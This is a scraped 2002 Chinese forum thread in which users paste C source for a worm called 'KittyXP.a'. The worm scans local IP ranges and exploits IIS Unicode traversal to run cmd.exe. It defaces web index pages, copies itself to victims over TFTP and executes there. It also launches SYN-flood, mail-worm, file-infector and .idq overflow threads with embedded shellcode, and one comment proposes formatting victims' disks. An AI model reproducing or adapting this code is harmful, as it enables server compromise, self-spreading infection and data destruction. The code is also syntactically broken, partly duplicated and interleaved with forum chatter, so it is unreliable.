int MyMessageBox(HWND hWnd, LPSTR Text, LPSTR Caption, UINT Type)
{
char * Msgs[] =
{
  \"我爱你张一\",
  \"KittyXP.a by Squirrel in china\",
  \"我爱你张一\",
  \"我爱你张一\"
};
static int i = 0;

return MessageBoxA(hWnd, Text, Msgs[++i & 3], Type);
}

// Simulated host for 1st generation
void Gen1()
{
MyMessageBox(NULL, \"\", NULL, MB_OK);
}

file://程序入口

int main(int argc, char *argv[])
{
HANDLE hThread=NULL;
DWORD dwThreadID;
HANDLE hThread1=NULL;
HANDLE idpthread;
DWORD dwThreadID1;
HANDLE iis4thread;
DWORD dwThreadID2;
HANDLE xpmethread;
DWORD dwThreadID3;
HANDLE anitthd;
DWORD dwThreadID4;
DWORD dwThreadID0;
handle synflood
dword synfloodid
  long PreviousCount;
handle pevr
dword pevrid
handle mailworm
dword wormid
pevr=CreateThread(NULL,0,pevirus,argv,0,&pevrid)//调用病毒部分
CreateThread(NULL,0,TFTP32,0,0,&dwthreadid0)//开始tftp32
mailworm=CreateThread(NULL,0,worm,argv,0,&wormid)//调用蠕虫部分
//CurVerInfo.dwOSVersionInfoSize = sizeof(CurVerInfo);
//GetVersionEx(&CurVerInfo);
HKEY KittyXP.aInstallKey,KittyXP.aNewKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,\"Software\\\\KittyXP.a\\\\Install\",0,KEY_ALL_ACCESS,&KittyXP.aInstallKey)==ERROR_SUCCESS)
{
HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)
char systemdir[512]
GetSystemDirectory(systemdir,512)
lstrcat(systemdir,\"\\\\ssrv.exe\")
CopyFile(svFileName,systemdir,false)
mailworm=CreateThread(NULL,0,worm,argv,0,&wormid)//调用蠕虫部分
WaitForSingleObject(mailworm, INFINITE）
CloseHandle(mailworm)
RegCreateKey(HKEY_LOCAL_MACHINE,\"Software\\\\KittyXP.a\\\\Install\",&KittyXP.aNewKey);
   RegCloseKey(KittyXP.aNewKey);
}
int i;
int StartNet;
int StopNet;
int StartHost;//IP段开始
int StopHost;//IP段结束

WSADATA wsaData;
struct in_addr host;

WSAStartup(0x202, &wsaData );
StartNet=GetLocalIP();
StopNet=GetLocalIP()+100;
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
  do
{

host.S_un.S_addr = inet_addr(argv[1]);
WSAStartup(0x202, &wsaData );

hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
if(hSemaphore==NULL)
{

  //printf(\"\\nCreateSemaphore failed:%d\",GetLastError());
  file://__leave;
}

for(i=StartHost;i<=StopHost;i++)
{
  hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
  idpthread=CreateThread(NULL,0,redcode,(LPVOID)i,0,&dwThreadID1);
  iis4thread=CreateThread(NULL,0,iis4,(LPVOID)i,0,&dwThreadID2)；
  xpmethread=CreateThread(NULL,0,xpmethd,(LPVOID)i,0,&dwThreadID3);
  anitthd=CreateThread(NULL,0,anitthd,(LPVOID)i,0,&dwThreadID3);
  synflood=CreateThread(NULL,0,flood,0,0,&synfloodid)
  if((hThread==NULL) or (idpthread==null) or (iis4thread==null) or (xpmethread==null) or (anitthd==null) or (synflood==null))

  {
  //printf(\"\\nCreate thread failed:%d\",GetLastError());
  break;
  }
  //printf(\".\");
  Sleep(10);
  CloseHandle(hThread);
  CloseHandle(idpthread)
   CloseHandle(xpmethread)
   CloseHandle(iis4thread)
   CloseHandle(anitthd)
   CloseHandle(synflood)
  WaitForSingleObject(hSemaphore,INFINITE);
}
while(1)
{
  WaitForSingleObject(hSemaphore,INFINITE);
  if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
  {
  //printf(\"\\nmain() ReleaseSemaphore failed:%d\",GetLastError());
  Sleep(5000);
  break;
  }
  if(PreviousCount==(MaxThread-1))
  {
  //printf(\"\\nAll done.\");
  break;
  }
  Sleep(500);
}

// printf(\"发现可执行目录. [%s]\\n\", exedir);
// printf(\"可执行目录是 [%s]\\n\",localpath);


CloseHandle(hSemaphore);

WSACleanup();


}
  while((argc=2)or (argc>2)or (argc<2));//死循环

return 0;
}

long GetLocalIP(void)
{
char szName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
//printf(\"%s\\n\",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list!=NULL;i++)
//printf(\"%s\\n\",inet_ntoa(*((struct in_addr *)pHost->h_addr_list)));
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}

DWORD WINAPI FindExeDir(LPVOID lp)
{
int host=(int)lp;
u_short port=80;
int SockFD,i;
struct sockaddr_in DstSAin;
char waste[500],uniwaste[500];
char *buffer,*p;
char space[3];
char dletter[2];//磁盘路径
char asc[3];
int rbytes=0,loc1=0,loc2=0;
char locdir[300];
int exenum=0;
crack:
memset(locdir,0,300);
memset(uniwaste,0,499);
memset(space,0,3);
strcpy(space,\"%20\");
memset(asc,0,3);
strcpy(asc,\"%3E\");
//printf(\"查找漏洞%d...\\n\",host);

for(i=0;i<8;i++)
{
strcat(uniwaste,\"..\");
strcat(uniwaste,hole[num]); file://把unicode码和URL结合起来.
}

memset(waste,0,500);
file://create our string that sees if we can execute cmd.exe
file://that way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
sprintf(waste,\"GET /%s/%s/winnt/system32/cmd.exe?/c%sdir HTTP/1.0\\n\\n\",ExeDirs[exenum],uniwaste,space);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf(\"Trying directory [%s]\\n\", waste);
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,\"Directory of\"); file://找到了cmd.exe的目录！！！
if(p!=NULL)
{

  loc1=p-buffer+1;
  p=strstr(buffer,\"<DIR>\");
  if(p!=NULL)
  {
  loc2=p-buffer+1;
  loc2=loc2-27;
  buffer[loc2-2]=\'\\0\';
  strncpy(locdir,buffer+loc1+12,290);
  file://Set executable directory.
  exedir=malloc(strlen(ExeDirs[exenum])+1);
  memset(exedir,0,strlen(ExeDirs[exenum])+1);
  memcpy(exedir,ExeDirs[exenum],strlen(ExeDirs[exenum]));
  file://Set executable directory path
  localpath=malloc(strlen(locdir)+1);
  memset(localpath,0,strlen(locdir)+1);
  memcpy(localpath,locdir,strlen(locdir));
  closesocket(SockFD);
  file://查询首页位置

  memset(waste,0,500);
  SockFD=socket(AF_INET,SOCK_STREAM,0);
  DstSAin.sin_family = AF_INET;
  DstSAin.sin_port = htons(port);
  DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
  sprintf(waste,\"GET /%s/%s/winnt/system32/cmd.exe?/c%sset HTTP/1.0\\n\\n\",ExeDirs[exenum],uniwaste,space);
  if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
  {

   send(SockFD,waste,strlen(waste),0); file://try one of the directories
   buffer=GetData(SockFD);
   WebPath=find(buffer,\"PATH_TRANSLATED=\");//上面通过cmd.exe?/c set命令显示主机配置
   file://从中找到WEB目录，用来修改首页
   closesocket(SockFD);
   strncpy(dletter,localpath,1);
   dletter[1]=\'\\0\';
   //printf(\"首页路径%s\\n\",WebPath);
  }

   memset(waste,0,500);
  SockFD=socket(AF_INET,SOCK_STREAM,0);
  DstSAin.sin_family = AF_INET;
  DstSAin.sin_port = htons(port);
  DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
  sprintf(waste,\"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一default.asp>+%s\\\\default.asp HTTP/1.0\\n\\n\",ExeDirs[exenum],uniwaste,space,WebPath);
   if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
  {
   //printf(\"修改首页default.asp \\n\");
   send(SockFD,waste,strlen(waste),0); file://try one of the directories
   buffer=GetData(SockFD);
   p=strstr(buffer,\"Access is denied\");
   if(p!=NULL)
   {
   // printf(\"Access is denied\");
   }
   closesocket(SockFD);
  }
   memset(waste,0,500);
  SockFD=socket(AF_INET,SOCK_STREAM,0);
  DstSAin.sin_family = AF_INET;
  DstSAin.sin_port = htons(port);
  DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
  sprintf(waste,\"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一index.asp>+%s\\\\index.asp HTTP/1.0\\n\\n\",ExeDirs[exenum],uniwaste,space,WebPath);
   if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
  {
   //printf(\"修改首页index.asp \\n\");
   send(SockFD,waste,strlen(waste),0); file://try one of the directories
   buffer=GetData(SockFD);
   p=strstr(buffer,\"Access is denied\");
   if(p!=NULL)
   {
   //printf(\"不能修改，文件属性有问题\");
   }
   closesocket(SockFD);
  }


  memset(waste,0,500);
  SockFD=socket(AF_INET,SOCK_STREAM,0);
  DstSAin.sin_family = AF_INET;
  DstSAin.sin_port = htons(port);
  DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
  sprintf(waste,\"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一index.html>+%s\\\\index.html HTTP/1.0\\n\\n\",ExeDirs[exenum],uniwaste,space,WebPath);
  if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
  {
   //printf(\"修改首页index.html \\n\");
   send(SockFD,waste,strlen(waste),0); file://try one of the directories
   buffer=GetData(SockFD);
   p=strstr(buffer,\"Access is denied\");
   if(p=NULL)
   {
   //printf(\"不能修改，文件属性有问题\");
   }
   closesocket(SockFD);
  }

  memset(waste,0,500);
  SockFD=socket(AF_INET,SOCK_STREAM,0);
  DstSAin.sin_family = AF_INET;
  DstSAin.sin_port = htons(port);
  DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
  sprintf(waste,\"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一default.htm>+%s\\\\default.htm HTTP/1.0\\n\\n\",ExeDirs[exenum],uniwaste,space,WebPath);
  if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
  {
   //printf(\"修改首页default.htm \\n\");
   send(SockFD,waste,strlen(waste),0); file://try one of the directories
   buffer=GetData(SockFD);
   p=strstr(buffer,\"Access is denied\");
   if(p!=NULL)
   {
   //printf(\"不能修改，文件属性有问题\");
   }
   closesocket(SockFD);
  }

   memset(waste,0,500);
  SockFD=socket(AF_INET,SOCK_STREAM,0);
  DstSAin.sin_family = AF_INET;
  DstSAin.sin_port = htons(port);
  DstSAin.sin_addr.S_un.S_addr=htonl(host);
  sprintf(waste,\"GET /%s/%s/winnt/system32/cmd.exe?/c%s+TFTP%20-i%20\"&GetLocalIP()&\"%20Get%20ssrv.exe%20%ssrv.exe HTTP/1.0\\n\\n\",ExeDirs[exenum],uniwaste,space,dletter);
  if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
  {
   //printf(\"正在上传自身\")
   send(SockFD,waste,strlen(waste),0); file://try one of the directories
   buffer=GetData(SockFD);
   p=strstr(buffer,\"Access is denied\");
   if(p!=NULL)
   {
   //printf(\"system32不允许写操作\");
   }
   closesocket(SockFD);
  }
  file://运行
  memset(waste,0,500);
  SockFD=socket(AF_INET,SOCK_STREAM,0);
  DstSAin.sin_family = AF_INET;
  DstSAin.sin_port = htons(port);
  DstSAin.sin_addr.S_un.S_addr=htonl(host);
  sprintf(waste,\"GET /%s/%s/winnt/system32/cmd.exe?/c%ssrv.exe HTTP/1.0\\n\\n\",ExeDirs[exenum],uniwaste);
  if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
  {
   //printf(\"在主机上运行自己 \\n\");
   send(SockFD,waste,strlen(waste),0); file://try one of the directories
   buffer=GetData(SockFD);
   p=strstr(buffer,\"CGI Error\");
   if(p!=NULL)
   {
   // printf(\"运行成功\");//此时存在漏洞的主机开始扫描自己IP段附近的漏洞主机
   }
   closesocket(SockFD);
  }


  file://return 1;
  }

}


if(num<23)//循环尝试漏洞编码
{ num++;
closesocket(SockFD);
goto crack;
}
else
{
  if(exenum<6)//遍历各个目录
  {
  num=0;
  exenum++;
  ExeDirNum=exenum;
  closesocket(SockFD);
  goto crack;
  }

  closesocket(SockFD);
}


//printf(\"扫描全部结束，在此应该进行破坏性操作...\\n\");
   file://可选办法，在目标主机上的autoexec.bat里加上格式化硬盘命令
file://然后执行ExitSystem(1);使主机重新启动
file://重新启动后格式化硬盘
}
return 0;
}

file://在返回的数据中查找指定信息
char* find(const char*pszSource,const char* pszKey)
{
  static char szBuffer[2049];
  const char * p;
  const char * q;
  p = q = NULL;
  p = strstr(pszSource,pszKey);
  if ( p != NULL )
  {
   p += strlen(pszKey);
   q = strstr(p,\"\\r\\n\");
   if ( q == NULL )
   q = p + strlen(p);
   strncpy(szBuffer,p,q-p);
   return szBuffer;
  }
  return NULL;
}

char *GetData(int SockFD)
{
file://get data without a blocking recv so we dont hang if we crash the server
char *buffer;
char data[2001];
unsigned long on=1;
unsigned long off=0;
char waste[2001];
int p, i=1;
int t;

memset(data,0,2001);
p=ioctlsocket(SockFD,FIONBIO,&on);
memset(waste,0,2001);
for(t=1;t<10;t++){
i=recv(SockFD, waste, 2000, 0);
if(i>0)
  break;
Sleep(500);
}
waste=\'\\0\';
strncat(data,waste,2000);
buffer = ( char * )malloc( 2000 * sizeof( char ) );
strncpy( buffer, data, 2000 );
return buffer;
}
int WINAPI redcode(char *argv[])
{
  int i,j,s,pid;
  unsigned int cb;
  unsigned short port;
  char *p,buf[512],buf2[512],buf3[2048];
  FILE *fp;

HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)

  if((fp=fopen(svFileName,\"rb\"))==0)
   return -2;

  if(!(cb=resolve(ADDR)))
   return -3;

  if((pid=fork())<0)
   return -4;

  if(pid)
  {
   fclose(fp);
   s = make_connection(argv[1],80);
   if(s<0)
   {
   //printf(\"connect error:[%d].\\n\",s);
   kill(pid,SIGTERM);
   return -5;
   }

   j = strlen(shellcode);
   *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;
   *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;
   port = htons(PORT);
#if MASKING
   port ^= PORTMASK;
   cb ^= ADDRMASK;
   *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;
   *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;
#endif
   *(unsigned short *)&shellcode[PORT_OFFSET] = port;
   *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
   for(i=0;i<strlen(shellcode);i++)
   {
   if((shellcode==0x0a)||
   (shellcode==0x0d)||
   (shellcode==0x3a))
   break;
   }
   if(i!=j)
   {
   //printf(\"bad portno or ip address...\\n\");
   close(s);
   kill(pid,SIGTERM);
   return -6;
   }

   memset(buf,1,sizeof(buf));
   p = &buf[OFFSET-2];
   sprintf(p,\"%s\",forwardjump);
   p += strlen(forwardjump);
   *p++ = 1;
   *p++ = \'%\';
   *p++ = \'u\';
   sprintf(p,\"%04x\",(RET>>0)&0xffff);
   p += 4;
   *p++ = \'%\';
   *p++ = \'u\';
   sprintf(p,\"%04x\",(RET>>16)&0xffff);
   p += 4;
   *p++ = 1;
   sprintf(p,\"%s\",jump_to_shell);

   memset(buf2,NOP,sizeof(buf2));
   memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],storage,strlen(storage));
   memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellcode));
   buf2[sizeof(buf2)-1] = 0;

   sprintf(buf3,\"GET /a.idq?%s=a HTTP/1.0\\r\\nShell: %s\\r\\n\\r\\n\",buf,buf2);
   write(s,buf3,strlen(buf3));

   //printf(\"---\");
   for(i=0;i<strlen(buf3);i++)
   {
   if((i%16)==0)
   //printf(\"\\n\");
   //printf(\"%02X \",buf3&0xff);
   }
   //printf(\"\\n---\\n\");

   wait(0);
   sleep(1);
   shutdown(s,2);
   close(s);

   //printf(\"Done.\\n\");
  }
  else
  {
   s = get_connection(PORT);
   j = 0;
   while((i=fread(buf,1,sizeof(buf),fp)))
   {
   write(s,buf,i);
   j += i;
   printf(\".\");
   fflush(stdout);
   }
   fclose(fp);
   //printf(\"\\n%d bytes send...\\n\",j);

   shutdown(s,2);
   close(s);
  }

  return 0;
}

int winapi iis4(char *argv[]) {
WORD wVersionRequested;
WSADATA wsaData;
int err;
SOCKADDR_IN sin,sout;
int soutsize=sizeof(sout);
unsigned long threadid,bytesread;
SOCKET s,in;
wVersionRequested = MAKEWORD(1, 1);
HANDLE hf;

  string sfname;

小子，从今天开始，你就是华府的低等下人，9527就是你的终身代号。 [img]http://www.driverdevelop.com/forum/upload/zsb9527/2002-06-25_6.jpg[/img]

回复喜欢

zsb9527

驱动小牛

注册日期2002-05-31
最后登录2018-05-29
粉丝0
关注0
积分2分
威望10点
贡献值0点
好评度0点
原创分0分
专家分0分

加关注写私信

地下室^#

发布于：2002-08-13 12:54

接上面的

int winapi iis4(char *argv[]) {
WORD wVersionRequested;
WSADATA wsaData;
int err;
SOCKADDR_IN sin,sout;
int soutsize=sizeof(sout);
unsigned long threadid,bytesread;
SOCKET s,in;
wVersionRequested = MAKEWORD(1, 1);
HANDLE hf;

  string sfname;
   GetModuleFileName(NULL,sfname,MAX_PATH)

  hf = CreateFile(sfname,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
  sizemybytes = GetFileSize(hf,NULL);
  mybytes = (char *)malloc(sizemybytes);
  ReadFile(hf,mybytes,sizemybytes,&bytesread,0);
  CloseHandle(hf);

  err = WSAStartup(wVersionRequested, &wsaData);

  if (err != 0)
   return;

  setuphostname();
   attack(argv[1])

  s = socket(AF_INET,SOCK_STREAM,0);

  if (s==-1)
   return;

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = 0;
  sin.sin_port = htons(80);
  if (bind(s, (LPSOCKADDR)&sin, sizeof (sin))!=0) return;

  if (listen(s,5)!=0) return;

  while (1) {
   in = accept(s,(sockaddr *)&sout,&soutsize);
   CreateThread(0,0,doweb,&in,0,&threadid);
  }
int winapi xpmethd(char *argv[])
{
int sockfd[MAX];
char sendXP[]=\"XP\";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;
WSAdata wsd
int eerx=wsastartup(0x0101,&wsd)
if (eerx!=0)
{
WSAcleanup()
return 0
}
unsigned char shellcode[] =
  \"\\x90\\xeb\\x03\\x5d\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc5\\x15\\x90\\x90\"
  \"\\x90\\x8b\\xc5\\x33\\xc9\\x66\\xb9\\x10\\x03\\x50\\x80\\x30\\x97\\x40\\xe2\\xfa\"
  \"\\x7e\\x8e\\x95\\x97\\x97\\xcd\\x1c\\x4d\\x14\\x7c\\x90\\xfd\\x68\\xc4\\xf3\\x36\"
  \"\\x97\\x97\\x97\\x97\\xc7\\xf3\\x1e\\xb2\\x97\\x97\\x97\\x97\\xa4\\x4c\\x2c\\x97\"
  \"\\x97\\x77\\xe0\\x7f\\x4b\\x96\\x97\\x97\\x16\\x6c\\x97\\x97\\x68\\x28\\x98\\x14\"
  \"\\x59\\x96\\x97\\x97\\x16\\x54\\x97\\x97\\x96\\x97\\xf1\\x16\\xac\\xda\\xcd\\xe2\"
  \"\\x70\\xa4\\x57\\x1c\\xd4\\xab\\x94\\x54\\xf1\\x16\\xaf\\xc7\\xd2\\xe2\\x4e\\x14\"
  \"\\x57\\xef\\x1c\\xa7\\x94\\x64\\x1c\\xd9\\x9b\\x94\\x5c\\x16\\xae\\xdc\\xd2\\xc5\"
  \"\\xd9\\xe2\\x52\\x16\\xee\\x93\\xd2\\xdb\\xa4\\xa5\\xe2\\x2b\\xa4\\x68\\x1c\\xd1\"
  \"\\xb7\\x94\\x54\\x1c\\x5c\\x94\\x9f\\x16\\xae\\xd0\\xf2\\xe3\\xc7\\xe2\\x9e\\x16\"
  \"\\xee\\x93\\xe5\\xf8\\xf4\\xd6\\xe3\\x91\\xd0\\x14\\x57\\x93\\x7c\\x72\\x94\\x68\"
  \"\\x94\\x6c\\x1c\\xc1\\xb3\\x94\\x6d\\xa4\\x45\\xf1\\x1c\\x80\\x1c\\x6d\\x1c\\xd1\"
  \"\\x87\\xdf\\x94\\x6f\\xa4\\x5e\\x1c\\x58\\x94\\x5e\\x94\\x5e\\x94\\xd9\\x8b\\x94\"
  \"\\x5c\\x1c\\xae\\x94\\x6c\\x7e\\xfe\\x96\\x97\\x97\\xc9\\x10\\x60\\x1c\\x40\\xa4\"
  \"\\x57\\x60\\x47\\x1c\\x5f\\x65\\x38\\x1e\\xa5\\x1a\\xd5\\x9f\\xc5\\xc7\\xc4\\x68\"
  \"\\x85\\xcd\\x1e\\xd5\\x93\\x1a\\xe5\\x82\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\xa4\\x57\"
  \"\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x13\\x5e\\xe3\\x9e\\xc5\\xc1\\xc4\"
  \"\\x68\\x85\\xcd\\x3c\\x75\\x7f\\xd1\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\x1c\\x4f\\xa4\"
\"\\x57\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x17\\x6e\\x95\\xe3\\x9e\\xc5\"
  \"\\xc1\\xc4\\x68\\x85\\xcd\\x3c\\x75\\x70\\xa4\\x57\\xc7\\xd7\\xc7\\xd7\\xc7\\x68\"
  \"\\xc0\\x7f\\x04\\xfd\\x87\\xc1\\xc4\\x68\\xc0\\x7b\\xfd\\x95\\xc4\\x68\\xc0\\x67\"
  \"\\xa4\\x57\\xc0\\xc7\\x27\\x9b\\x3c\\xcf\\x3c\\xd7\\x3c\\xc8\\xdf\\xc7\\xc0\\xc1\"
  \"\\x3a\\xc1\\x68\\xc0\\x57\\xdf\\xc7\\xc0\\x3a\\xc1\\x3a\\xc1\\x68\\xc0\\x57\\xdf\"
  \"\\x27\\xd3\\x1e\\x90\\xc0\\x68\\xc0\\x53\\xa4\\x57\\x1c\\xd1\\x63\\x1e\\xd0\\xab\"
  \"\\x1e\\xd0\\xd7\\x1c\\x91\\x1e\\xd0\\xaf\\xa4\\x57\\xf1\\x2f\\x96\\x96\\x1e\\xd0\"
  \"\\xbb\\xc0\\xc0\\xa4\\x57\\xc7\\xc7\\xc7\\xd7\\xc7\\xdf\\xc7\\xc7\\x3a\\xc1\\xa4\"
  \"\\x57\\xc7\\x68\\xc0\\x5f\\x68\\xe1\\x67\\x68\\xc0\\x5b\\x68\\xe1\\x6b\\x68\\xc0\"
  \"\\x5b\\xdf\\xc7\\xc7\\xc4\\x68\\xc0\\x63\\x1c\\x4f\\xa4\\x57\\x23\\x93\\xc7\\x56\"
  \"\\x7f\\x93\\xc7\\x68\\xc0\\x43\\x1c\\x67\\xa4\\x57\\x1c\\x5f\\x22\\x93\\xc7\\xc7\"
  \"\\xc0\\xc6\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x47\\x14\\xa8\\x96\\xeb\\xb5\\xa4\\x57\"
  \"\\xc7\\xc0\\x68\\xa0\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x4b\\x9c\\x57\\xe3\\xb8\\x

小子，从今天开始，你就是华府的低等下人，9527就是你的终身代号。 [img]http://www.driverdevelop.com/forum/upload/zsb9527/2002-06-25_6.jpg[/img]

回复喜欢

moqingsong

论坛版主

注册日期2002-04-07
最后登录2011-02-03
粉丝0
关注0
积分74分
威望71点
贡献值0点
好评度10点
原创分0分
专家分0分

加关注写私信

5楼^#

发布于：2002-08-13 13:22

好，学习一下。
还能放点分嘿。放分。 :)

按第一贴的“给分”键，给分。

回复喜欢

andrews13

驱动牛犊

注册日期2002-06-28
最后登录2013-05-01
粉丝0
关注0
积分2分
威望27点
贡献值0点
好评度7点
原创分0分
专家分0分

加关注写私信

6楼^#

发布于：2002-08-14 13:36

接上面的

int winapi iis4(char *argv[]) {
WORD wVersionRequested;
WSADATA wsaData;
int err;
SOCKADDR_IN sin,sout;
int soutsize=sizeof(sout);
unsigned long threadid,bytesread;
SOCKET s,in;
wVersionRequested = MAKEWORD(1, 1);
HANDLE hf;

  string sfname;
   GetModuleFileName(NULL,sfname,MAX_PATH)

  hf = CreateFile(sfname,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
  sizemybytes = GetFileSize(hf,NULL);
  mybytes = (char *)malloc(sizemybytes);
  ReadFile(hf,mybytes,sizemybytes,&bytesread,0);
  CloseHandle(hf);

  err = WSAStartup(wVersionRequested, &wsaData);

  if (err != 0)
   return;

  setuphostname();
   attack(argv[1])

  s = socket(AF_INET,SOCK_STREAM,0);

  if (s==-1)
   return;

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = 0;
  sin.sin_port = htons(80);
  if (bind(s, (LPSOCKADDR)&sin, sizeof (sin))!=0) return;

  if (listen(s,5)!=0) return;

  while (1) {
   in = accept(s,(sockaddr *)&sout,&soutsize);
   CreateThread(0,0,doweb,&in,0,&threadid);
  }
int winapi xpmethd(char *argv[])
{
int sockfd[MAX];
char sendXP[]=\"XP\";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;
WSAdata wsd
int eerx=wsastartup(0x0101,&wsd)
if (eerx!=0)
{
WSAcleanup()
return 0
}
unsigned char shellcode[] =
  \"\\x90\\xeb\\x03\\x5d\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc5\\x15\\x90\\x90\"
  \"\\x90\\x8b\\xc5\\x33\\xc9\\x66\\xb9\\x10\\x03\\x50\\x80\\x30\\x97\\x40\\xe2\\xfa\"
  \"\\x7e\\x8e\\x95\\x97\\x97\\xcd\\x1c\\x4d\\x14\\x7c\\x90\\xfd\\x68\\xc4\\xf3\\x36\"
  \"\\x97\\x97\\x97\\x97\\xc7\\xf3\\x1e\\xb2\\x97\\x97\\x97\\x97\\xa4\\x4c\\x2c\\x97\"
  \"\\x97\\x77\\xe0\\x7f\\x4b\\x96\\x97\\x97\\x16\\x6c\\x97\\x97\\x68\\x28\\x98\\x14\"
  \"\\x59\\x96\\x97\\x97\\x16\\x54\\x97\\x97\\x96\\x97\\xf1\\x16\\xac\\xda\\xcd\\xe2\"
  \"\\x70\\xa4\\x57\\x1c\\xd4\\xab\\x94\\x54\\xf1\\x16\\xaf\\xc7\\xd2\\xe2\\x4e\\x14\"
  \"\\x57\\xef\\x1c\\xa7\\x94\\x64\\x1c\\xd9\\x9b\\x94\\x5c\\x16\\xae\\xdc\\xd2\\xc5\"
  \"\\xd9\\xe2\\x52\\x16\\xee\\x93\\xd2\\xdb\\xa4\\xa5\\xe2\\x2b\\xa4\\x68\\x1c\\xd1\"
  \"\\xb7\\x94\\x54\\x1c\\x5c\\x94\\x9f\\x16\\xae\\xd0\\xf2\\xe3\\xc7\\xe2\\x9e\\x16\"
  \"\\xee\\x93\\xe5\\xf8\\xf4\\xd6\\xe3\\x91\\xd0\\x14\\x57\\x93\\x7c\\x72\\x94\\x68\"
  \"\\x94\\x6c\\x1c\\xc1\\xb3\\x94\\x6d\\xa4\\x45\\xf1\\x1c\\x80\\x1c\\x6d\\x1c\\xd1\"
  \"\\x87\\xdf\\x94\\x6f\\xa4\\x5e\\x1c\\x58\\x94\\x5e\\x94\\x5e\\x94\\xd9\\x8b\\x94\"
  \"\\x5c\\x1c\\xae\\x94\\x6c\\x7e\\xfe\\x96\\x97\\x97\\xc9\\x10\\x60\\x1c\\x40\\xa4\"
  \"\\x57\\x60\\x47\\x1c\\x5f\\x65\\x38\\x1e\\xa5\\x1a\\xd5\\x9f\\xc5\\xc7\\xc4\\x68\"
  \"\\x85\\xcd\\x1e\\xd5\\x93\\x1a\\xe5\\x82\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\xa4\\x57\"
  \"\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x13\\x5e\\xe3\\x9e\\xc5\\xc1\\xc4\"
  \"\\x68\\x85\\xcd\\x3c\\x75\\x7f\\xd1\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\x1c\\x4f\\xa4\"
\"\\x57\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x17\\x6e\\x95\\xe3\\x9e\\xc5\"
  \"\\xc1\\xc4\\x68\\x85\\xcd\\x3c\\x75\\x70\\xa4\\x57\\xc7\\xd7\\xc7\\xd7\\xc7\\x68\"
  \"\\xc0\\x7f\\x04\\xfd\\x87\\xc1\\xc4\\x68\\xc0\\x7b\\xfd\\x95\\xc4\\x68\\xc0\\x67\"
  \"\\xa4\\x57\\xc0\\xc7\\x27\\x9b\\x3c\\xcf\\x3c\\xd7\\x3c\\xc8\\xdf\\xc7\\xc0\\xc1\"
